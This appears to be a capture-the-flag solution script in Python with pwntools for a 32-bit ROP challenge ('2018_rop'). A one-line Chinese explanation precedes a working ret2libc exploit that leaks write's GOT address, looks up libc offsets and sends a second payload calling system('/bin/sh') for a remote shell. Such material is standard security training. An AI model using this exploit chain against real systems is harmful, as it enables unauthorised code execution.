exp 脚本
先 rop 用 write 泄露 got 表地址,计算 system 和 /bin/sh 的偏移,回到漏洞函数再次 rop 调用 system('/bin/sh')
from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'
io = remote('node3.buuoj.cn',28574)
elf = ELF('./2018_rop')
write_got = elf.got['write']
write_plt = elf.plt['write']
read_plt = elf.plt['read']
payload = 'a' * (0x88 + 0x4)
payload += p32(write_plt)
payload += p32(0x80484c6)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)
io.sendline(payload)
write_addr = io.recv()
print hex(u32(write_addr))
#libcbase = u32(write_addr) - libc.symbols['write']
#system = libcbase + libc.symbols['system']
#binsh = libcbase + libc.search('/bin/sh').next()
obj = LibcSearcher('write',u32(write_addr))
libcbase = u32(write_addr) - obj.dump('write')
system = libcbase + obj.dump('system')
binsh = libcbase + obj.dump("str_bin_sh")
payload = 'a' * (0x88 + 4)
payload += p32(system)
payload += p32(0)
payload += p32(binsh)
sleep(0.5)
io.sendline(payload)
io.interactive()
